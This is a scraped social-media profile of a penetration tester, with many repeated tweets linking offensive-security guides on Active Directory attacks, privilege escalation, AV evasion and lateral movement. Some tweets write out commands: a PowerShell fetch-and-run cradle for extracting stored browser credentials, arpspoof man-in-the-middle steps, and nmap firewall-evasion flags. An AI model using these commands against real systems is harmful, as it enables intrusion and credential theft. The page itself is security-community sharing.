Florian Hansemann Profile Banner
Florian Hansemann Profile
Florian Hansemann

@CyberWarship

77,340
Followers
48
Following
9,022
Media
17,612
Statuses

Father, Founder @HanseSecure , Pentesting, Student, ExploitDev, Redteaming, InfoSec & CyberCyber; -- Mastodon:

Munich, Germany
Joined January 2015
Don't wanna be here? Send us removal request.
Pinned Tweet
@CyberWarship
Florian Hansemann
4 years
Meterpreter session 1 opened #infosec #phishing #happyHacking
Tweet media one
40
33
410
@CyberWarship
Florian Hansemann
3 years
Windows Kernel Exploitation Tutorial Part 1: Setup Part 2: Stack Overflow Part 3: Memory Overwrite Part 4: Pool Overflow Part 5: NULL Pointer Dereference
Tweet media one
Tweet media two
Tweet media three
3
624
2K
@CyberWarship
Florian Hansemann
3 years
Windows Kernel Exploitation Tutorial Part 1: Setup Part 2: Stack Overflow Part 3: Memory Overwrite Part 4: Pool Overflow Part 5: NULL Pointer Dereference
Tweet media one
Tweet media two
Tweet media three
10
556
1K
@CyberWarship
Florian Hansemann
4 years
AD Attack 1) Performing domain recon using PS 2) Attack mapping with bloodhound 3) Extracting passwd hashes 4) Pass-the-hash attacks with mimikatz #infosec #pentest #redteam
8
423
1K
@CyberWarship
Florian Hansemann
5 years
A post-exploitation powershell tool for extracting juicy info from memory. #infosec #pentest #redteam
Tweet media one
9
432
1K
@CyberWarship
Florian Hansemann
4 years
Blue Team fundamentals Part Two: Windows Processes. #infosec #blueteam #redteam
3
269
1K
@CyberWarship
Florian Hansemann
4 years
AD Attack 1) Performing domain recon using PS 2) Attack mapping with bloodhound 3) Extracting passwd hashes 4) Pass-the-hash attacks with mimikatz #infosec #pentest #redteam
6
386
1K
@CyberWarship
Florian Hansemann
3 years
ZDI-21-1053: Bypassing Windows Lock Screen #infosec #pentest #redteam
Tweet media one
Tweet media two
Tweet media three
8
306
1K
@CyberWarship
Florian Hansemann
4 years
AD Attack 1) Performing domain recon using PS 2) Attack mapping with bloodhound 3) Extracting passwd hashes 4) Pass-the-hash attacks with mimikatz #infosec #pentest #redteam
10
358
956
@CyberWarship
Florian Hansemann
4 years
Docker for Pentesters - My biggest problem in my job is the limited time. That's why I'm all the more grateful to my friend @ropnop for this great post. Have a look, it's super helpful! #infosec #pentest #bugbounty
5
289
911
@CyberWarship
Florian Hansemann
4 years
Hacking SQL Server Stored Procedures 1: (un)Trustworthy Databases 2: User Impersonation 3: SQL Injection 4: Enumerating Domain Accounts #infosec #pentest #redteam
6
255
893
@CyberWarship
Florian Hansemann
4 years
AD Attack 1) Performing domain recon using PS 2) Attack mapping with bloodhound 3) Extracting passwd hashes 4) Pass-the-hash attacks with mimikatz #infosec #pentest #redteam
4
340
889
@CyberWarship
Florian Hansemann
4 years
I Like to Move It: Windows Lateral Movement Part 1 - WMI Event Subscription Part 2 - DCOM Part 3 - DLL Hijacking - thanks for sharing @domchell #infosec #pentest #redteam
2
297
871
@CyberWarship
Florian Hansemann
5 years
Antivirus Evasion with Python - really good read! #infosec #pentest #redteam
4
347
833
@CyberWarship
Florian Hansemann
5 years
The Regex Cheat Sheet  #infosec
Tweet media one
4
312
838
@CyberWarship
Florian Hansemann
4 years
AD Attack 1) Performing domain recon using PS 2) Attack mapping with bloodhound 3) Extracting passwd hashes 4) Pass-the-hash attacks with mimikatz #infosec #pentest #redteam
5
369
838
@CyberWarship
Florian Hansemann
5 years
Undetectable C# & C++ Reverse Shells - don't forget, it's just a title ;-) still some good ideas to bypass AVs #infosec #pentest #redteam
4
327
822
@CyberWarship
Florian Hansemann
3 years
Blue Team fundamentals Part Two: Windows Processes. #infosec #blueteam #redteam
9
244
817
@CyberWarship
Florian Hansemann
5 years
Windows Command Line cheatsheet (part 2): WMIC - Bookmark this! Saved my day several times 😉 #infosec #pentest #redteam
1
318
803
@CyberWarship
Florian Hansemann
5 years
Red Teaming Mind Map from The Hacker Playbook 3 - thanks for sharing @lancinimarco #infosec #pentest #redteam
Tweet media one
5
351
803
@CyberWarship
Florian Hansemann
4 years
AD Attack 1) Performing domain recon using PS 2) Attack mapping with bloodhound 3) Extracting passwd hashes 4) Pass-the-hash attacks with mimikatz #infosec #pentest #redteam
6
293
789
@CyberWarship
Florian Hansemann
4 years
Antivirus Evasion with Python - really good read! #infosec #pentest #redteam
6
309
775
@CyberWarship
Florian Hansemann
4 years
File upload vulnerability scanner and exploitation tool #infosec #pentest #bugbounty
Tweet media one
1
269
774
@CyberWarship
Florian Hansemann
6 years
nmap options/ideas to avoid Firewall fragmentation -f change default MTU --mtu 24 random number of decoys -D RND:10 Change Source port --source-port 80 Append Random Data to Packet --data-length 25 MAC Address Spoofing --spoof-mac Dell/Apple/3Com #infosec #pentest
7
341
783
@CyberWarship
Florian Hansemann
4 years
Change your MAC Address via Powershell Set-NetAdapter -Name "Ethernet 1" -MacAddress "00-10-18-57-1B-0D" #infosec #pentest
16
219
736
@CyberWarship
Florian Hansemann
2 years
"Windows 11 reverse shell in 7steps, undetected by Microsoft Defender" #redteam #infosec #pentest
8
206
745
@CyberWarship
Florian Hansemann
6 years
Red Teaming Mind Map from The Hacker Playbook 3 #infosec #pentest #redteam
Tweet media one
4
342
732
@CyberWarship
Florian Hansemann
5 years
Detection Lab Collection of Packer & Vagrant scripts that quickly bring a Windows AD online, complete with a collection of endpoint security tooling & logging best practices 😎 WriteUp Code #infosec #pentest #blueteam #redteam
6
303
714
@CyberWarship
Florian Hansemann
4 years
Penetration Testing / OSCP Biggest Reference Bank - really huge list #infosec #pentest #OSCP
6
203
706
@CyberWarship
Florian Hansemann
5 years
Just 3 Lines of native Powershell to extract stored credentials from Edge && IE Code: Usage: powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('')" #infosec #pentest #redteam
12
341
710
@CyberWarship
Florian Hansemann
4 years
AZURE AD INTRODUCTION FOR RED TEAMERS #infosec #pentest #redteam
Tweet media one
3
199
711
@CyberWarship
Florian Hansemann
5 years
Detection Lab Collection of Packer & Vagrant scripts that quickly bring a Windows AD online, complete with a collection of endpoint security tooling & logging best practices 😎 WriteUp Code #infosec #pentest #blueteam #redteam
3
293
709
@CyberWarship
Florian Hansemann
4 years
A Red Teamer's guide to pivoting #infosec #pentest #redteam
Tweet media one
3
263
703
@CyberWarship
Florian Hansemann
4 years
I Like to Move It: Windows Lateral Movement Part 1 - WMI Event Subscription Part 2 - DCOM Part 3 - DLL Hijacking - thanks for sharing @domchell #infosec #pentest #redteam
6
268
701
@CyberWarship
Florian Hansemann
4 years
SQL Injection Cheat Sheet - one of the best SQL cheats out there! #infosec #pentest #bugbounty
4
231
693
@CyberWarship
Florian Hansemann
6 years
nmap options/ideas to avoid Firewall fragmentation -f change default MTU --mtu 24 random number of decoys -D RND:10 Change Source port --source-port 80 Append Random Data to Packet --data-length 25 MAC Address Spoofing --spoof-mac Dell/Apple/3Com #infosec #pentest
8
285
690
@CyberWarship
Florian Hansemann
5 years
Windows Privilege Escalation Guide #infosec #pentest #redteam
5
271
671
@CyberWarship
Florian Hansemann
3 years
Top 16 Active Directory Vulnerabilities This article provides practical information on how to pentest Active Directory environments using a list of 16 most common AD vulnerabilities and mis-configurations. #pentest #infosec #redteam
Tweet media one
Tweet media two
Tweet media three
0
231
652
@CyberWarship
Florian Hansemann
5 years
Detection Lab Collection of Packer & Vagrant scripts that quickly bring a Windows AD online, complete with a collection of endpoint security tooling & logging best practices 😎 WriteUp Code #infosec #pentest #blueteam #redteam
7
262
629
@CyberWarship
Florian Hansemann
6 years
Passing OSCP - really huge command reference for pentesting and the like #infosec #pentest #bugbounty
4
268
621
@CyberWarship
Florian Hansemann
4 years
Detection Lab Collection of Packer & Vagrant scripts that quickly bring a Windows AD online, complete with a collection of endpoint security tooling & logging best practices 😎 WriteUp Code #infosec #pentest #blueteam #redteam
2
248
625
@CyberWarship
Florian Hansemann
4 years
Detection Lab Collection of Packer & Vagrant scripts that quickly bring a Windows AD online, complete with a collection of endpoint security tooling & logging best practices 😎 WriteUp Code #infosec #pentest #blueteam #redteam
3
170
603
@CyberWarship
Florian Hansemann
3 years
ZDI-21-1053: Bypassing Windows Lock Screen #infosec #pentest #redteam
Tweet media one
Tweet media two
Tweet media three
9
219
613
@CyberWarship
Florian Hansemann
5 years
Red Teaming Mind Map from The Hacker Playbook 3 - thanks for sharing @lancinimarco #infosec #pentest #redteam
Tweet media one
2
283
612
@CyberWarship
Florian Hansemann
5 years
Simple Webserver with ncat ncat --keep-open -l -p 1337 -c "printf 'HTTP/1.1 200 OK\r\n\r\n'; cat ~/evil.html" What's your way to quickly start a webserver ? 😎 #infosec #pentest
18
189
593
@CyberWarship
Florian Hansemann
5 years
Windows Privilege Escalation Guide #infosec #pentest #redteam
1
240
602
@CyberWarship
Florian Hansemann
5 years
Windows Command Line cheatsheet (part 2): WMIC - Bookmark this! Saved my day several times 😉 #infosec #pentest #redteam
3
209
598
@CyberWarship
Florian Hansemann
4 years
Change your MAC Address via Powershell Set-NetAdapter -Name "Ethernet 1" -MacAddress "00-10-18-57-1B-0D" #infosec
7
198
587
@CyberWarship
Florian Hansemann
4 years
A Red Teamer's guide to pivoting #infosec #pentest #redteam
Tweet media one
2
207
590
@CyberWarship
Florian Hansemann
5 years
Tweet media one
70
21
588
@CyberWarship
Florian Hansemann
4 years
AZURE AD INTRODUCTION FOR RED TEAMERS #infosec #pentest #redteam
Tweet media one
3
207
588
@CyberWarship
Florian Hansemann
3 years
AD Attack 1) Performing domain recon using PS 2) Attack mapping with bloodhound 3) Extracting passwd hashes 4) Pass-the-hash attacks with mimikatz #infosec #pentest #redteam
Tweet media one
1
230
586
@CyberWarship
Florian Hansemann
3 years
AD Attack 1) Performing domain recon using PS 2) Attack mapping with bloodhound 3) Extracting passwd hashes 4) Pass-the-hash attacks with mimikatz #infosec #pentest #redteam
1
215
583
@CyberWarship
Florian Hansemann
4 years
Seeing so many Hacker, Consultant, Security Engineers, Pentester, ... and nobody uses ncat -ssl $IP $Port Instead of nc $IP $Port There is something called encryption, especially while doing remote stuff via the Internet 😒 #infosec #pentest #redteam #hacking
17
123
563
@CyberWarship
Florian Hansemann
4 years
Just 3 Lines of native Powershell to extract stored credentials from Edge && IE Code: Usage: powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('')" #infosec #pentest #redteam
7
149
582
@CyberWarship
Florian Hansemann
5 years
Hacking SQL Server Stored Procedures 1: (un)Trustworthy Databases 2: User Impersonation 3: SQL Injection 4: Enumerating Domain Accounts #infosec #pentest #redteam
3
229
577
@CyberWarship
Florian Hansemann
4 years
Win Brute Logon - local password brute force #infosec #pentest
Tweet media one
8
133
564
@CyberWarship
Florian Hansemann
4 years
Simple tool for searching of default credentials for network devices, web applications and more. Search through 523 vendors and their 2084 default passwords #infosec #pentest
Tweet media one
3
214
561
@CyberWarship
Florian Hansemann
5 years
Blue Team fundamentals Part Two: Windows Processes. #infosec #blueteam #redteam
1
169
559
@CyberWarship
Florian Hansemann
4 years
Red Teaming Mind Map from The Hacker Playbook 3 - thanks for sharing @lancinimarco #infosec #pentest #redteam
Tweet media one
6
208
553
@CyberWarship
Florian Hansemann
2 years
"Did You Know Your Browser’s Autofill Credentials Could Be Stolen via Cross-Site Scripting (XSS)" #infosec #pentest #redteam
Tweet media one
Tweet media two
Tweet media three
Tweet media four
9
175
552
@CyberWarship
Florian Hansemann
1 year
"CS:GO: From Zero to 0-day" #infosec #pentest #redteam
Tweet media one
Tweet media two
5
104
530
@CyberWarship
Florian Hansemann
5 years
Active Directory Assessment and Privilege Escalation Script - thanks for sharing @Haus3c #infosec #pentest #redteam
1
195
544
@CyberWarship
Florian Hansemann
3 years
HOW ATTACKERS ARE BYPASSING POWERSHELL PROTECTIONS #infosec #pentest #redteam #blueteam
Tweet media one
Tweet media two
5
169
532
@CyberWarship
Florian Hansemann
5 years
Windows Privilege Escalation Guide #infosec #pentest #redteam
4
219
530
@CyberWarship
Florian Hansemann
2 years
Make a USB Rubber Ducky with less than $3 #infosec #pentest #redteam
Tweet media one
Tweet media two
Tweet media three
Tweet media four
6
154
522
@CyberWarship
Florian Hansemann
3 years
AD Attack 1) Performing domain recon using PS 2) Attack mapping with bloodhound 3) Extracting passwd hashes 4) Pass-the-hash attacks with mimikatz #infosec #pentest #redteam
Tweet media one
3
210
524
@CyberWarship
Florian Hansemann
4 years
A collection of open source and commercial tools that aid in red team operations. - super useful resource! #infosec #pentest #redteam
Tweet media one
6
189
530
@CyberWarship
Florian Hansemann
4 years
Lateral Movement \ Windows and Active Directory - great content & very well written, thanks for sharing @dottor_morte #infosec #pentest #redteam
3
218
518
@CyberWarship
Florian Hansemann
3 years
I Like to Move It: Windows Lateral Movement Part 1 - WMI Event Subscription Part 2 - DCOM Part 3 - DLL Hijacking - thanks for sharing @domchell #infosec #pentest #redteam
Tweet media one
3
215
522
@CyberWarship
Florian Hansemann
2 years
red-team-scripts: A collection of Red Team focused tools, scripts, and notes #infosec #pentest #redteam
Tweet media one
Tweet media two
3
163
483
@CyberWarship
Florian Hansemann
5 years
MitM Copy&Paste Sheet 😎 #forwarding sysctl -w net.ipv4.ip_forward=1 #redirect Traffic arpspoof -i [Interface] -t [tgtIP] [RouterIP] arpspoof -i [Interface] -t [RouterIP] [tgtIP] #sniff pictures driftnet -i [Interface] #sniff URLs urlsnarf -i [Interface] #infosec #pentest
3
193
479
@CyberWarship
Florian Hansemann
5 years
SQL Injection Cheat Sheet - super useful one! #infosec #pentest #bugbounty
1
184
472
@CyberWarship
Florian Hansemann
5 years
For all Hunters on @hackthebox_eu or the Like: plz safety first via apt-get install ufw ufw default deny incoming ufw enable For Connection from target to you port: ufw allow from $target to any port $port And Now: Hack the Planet! 😎 #infosec #pentest #hacking #CTF
9
151
474
@CyberWarship
Florian Hansemann
2 years
"LinuxForensics: Everything related to Linux Forensics" #pentest #redteam #infosec
Tweet media one
1
147
470
@CyberWarship
Florian Hansemann
5 years
Detection Lab Collection of Packer & Vagrant scripts that quickly bring a Windows AD online, complete with a collection of endpoint security tooling & logging best practices 😲 WriteUp Code #infosec #pentest #blueteam #redteam
1
196
468
@CyberWarship
Florian Hansemann
5 years
The Internals of AppLocker Part 1: Overview and Setup Part 2: Blocking Process Creation Part 3: Access Tokens and Access Checking Part 4: Blocking DLL Loading #infosec #blueteam
0
222
475
@CyberWarship
Florian Hansemann
5 years
File upload vulnerability scanner and exploitation tool. #infosec #pentest #bugbounty
Tweet media one
2
192
464
@CyberWarship
Florian Hansemann
5 years
HackBar plugin for Burpsuite  #infosec #pentest #bugbounty
2
182
462
@CyberWarship
Florian Hansemann
4 years
No Privilege Escalating through standard methods ? whoami /priv If you got one of these == win 😉 SeBackupPrivilege, SeDebugPrivilege, SeTakeOwnershipPrivilege, SeTcbPrivilege, SeCreateToken Privilege, SeLoadDriver Privilege, SeImpersonate #infosec #pentest #redteam
3
140
459
@CyberWarship
Florian Hansemann
3 years
Azure-Red-Team: Azure Security Resources and Notes #infosec #pentest #redteam
Tweet media one
2
164
463
@CyberWarship
Florian Hansemann
6 years
Windows Privilege Escalation Guide #infosec #pentest #redteam
3
219
458